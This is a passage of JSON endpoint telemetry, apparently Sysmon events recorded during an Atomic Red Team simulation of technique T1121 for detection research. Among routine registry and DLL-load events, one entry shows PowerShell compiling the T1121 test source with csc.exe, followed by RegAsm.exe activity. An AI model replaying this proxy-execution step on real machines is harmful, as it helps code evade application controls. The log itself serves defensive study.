"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "file", - "file_name": "key.snk", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\key.snk", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7696, - "ppid": 7036, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "create", - "timestamp": 131883570869860000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "csc.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869810016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "psapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570869960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mscorlib.ni.dll", - "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 